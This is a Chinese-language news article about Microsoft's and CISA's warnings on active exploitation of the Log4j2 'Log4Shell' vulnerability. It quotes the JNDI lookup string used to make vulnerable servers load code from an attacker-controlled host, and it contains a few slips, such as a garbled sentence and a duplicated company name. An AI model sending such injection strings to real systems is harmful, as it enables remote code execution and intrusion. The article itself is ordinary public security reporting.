微軟警告比SolarWinds影響更深遠的Log4j2漏洞利用

微軟再次發出了來自具有深厚背景的黑客組織的網絡攻擊預警,可知問題源於 Java 日誌庫的 Log4j2 漏洞(CVE-2021-44228)。這家雷德蒙德科技巨頭指出,世界多地的黑客已開始利用這項更複雜的日誌協議技術,來遠程訪問受害者的設備。目前觀察到的大部分攻擊,主要涉及各路人馬的大規模掃描。

1.png

據悉,微軟旗下的多個威脅情報團隊 —— 包括 MSTIC 威脅情報中心、 Microsoft 365 Defender 威脅情報團隊、RiskIQ 和 DART 檢測響應團隊 —— 一直在密切關注 Apache Log4j2 的遠程代碼執行(RCE)漏洞。

2.png

CVE-2021-44228 漏洞披露公告指出,被稱作“Log4Shell”的漏洞攻擊,往往在 Web 日誌請求中包含如下字符串:

${jndi:ldap://[attacker site]/a}

2-1.png

美國網絡安全和基礎設施安全局(CISA)也證實了微軟的說法,此前該機構同樣通報了 Log4Shell 漏洞的廣泛利用。

2-2.png

CISA 負責人 Jen Easterly 於昨日接受 CNN 採訪時重申,若不迅速採取補救措施,各個聯邦機構的設備、服務、乃至整個互聯網,都將處於一個相當可怕的境地。

3.png

微軟警告稱,Log4j2 的風險源於兩個方面。其一是漏洞可被輕鬆利用,其二是基於其構建的產品數量 —— 而 Apache Log4j2 就是當前最流行的 Java 日誌庫之一。

3-1.jpg

據悉,日誌庫用於為開發者提供有關服務和產品的附加信息,允許其控制在應用程序執行期間、用戶登錄特定服務 / 設備的錯誤報告,並在遇到功能問題時收集相關數據。

通過日誌庫的使用,開發者還可深入了解或收集設備詳情,包括 CPU 類型 / GPU 型號、驅動程序版本、以及系統內存等。

攻擊者會對使用 Log4j2 生成日誌的目標系統執行 HTTP 請求,該日誌利用 JNDI 向攻擊者控制的站點執行請求,最終導致被利用的進程訪問站點並執行有效負載。

在許多觀察到的案例中,攻擊者往往拿到了 DNS 日誌系統的參數,旨在記錄對站點的請求、以對易受攻擊的系統進行指紋識別。

4.png

此前已知的一種漏洞利用,涉及微軟旗下的《我的世界》服務器。攻擊者以聊天框作為中部署的消息內容作為管道,試圖滲透用戶系統並奪得控制權。

事實上,全球許多知名企業都面臨著巨大的風險,其中不乏微軟、Twitter、蘋果、亞馬遜、百度、Cloudflare、網易、Cloudflare 等科技巨頭。

網絡安全公司 Check Point 指出,截至目前,其 GitHub 項目的下載量已經超過 40 萬次。遺憾的是,儘管 Apache 已經發布了一個修補程序,但各家公司的實施方案不盡相同。

對於數百上千萬的客戶來說,這意味着他們仍將在未來一段時間裡面臨 Log4j 入侵風險,或導致大量用戶數據暴露於在外。

相關文章:

CISA敦促美國聯邦機構在聖誕節前完成Log4Shell漏洞修補

(0)
上一篇 2021-12-16 10:37
下一篇 2021-12-16 10:37

相关推荐